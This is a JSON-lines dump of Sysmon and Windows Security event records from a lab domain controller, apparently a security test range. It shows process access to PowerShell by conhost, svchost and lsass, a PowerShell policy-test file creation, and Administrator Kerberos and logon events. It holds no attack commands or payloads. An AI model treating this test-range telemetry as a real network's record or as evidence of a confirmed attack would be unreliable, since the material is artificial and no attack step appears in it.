{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5414,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00105B620A00}","TargetProcessId":"796","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5415,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.234\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.234","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00105B620A00}","TargetProcessId":"796","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5416,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.234\r\nProcessGuid: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nProcessId: 796\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nrdmkr00.azu.ps1\r\nCreationUtcTime: 2020-08-01 05:52:46.234","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.234","ProcessGuid":"{A837DB8D-032E-5F25-0000-00105B620A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nrdmkr00.azu.ps1","CreationUtcTime":"2020-08-01 05:52:46.234","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5417,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.265\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.265","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00105B620A00}","TargetProcessId":"796","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5418,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.265\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.265","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00105B620A00}","TargetProcessId":"796","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5419,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220649,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220650,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220651,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220652,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA6DFE\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa6dfe","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
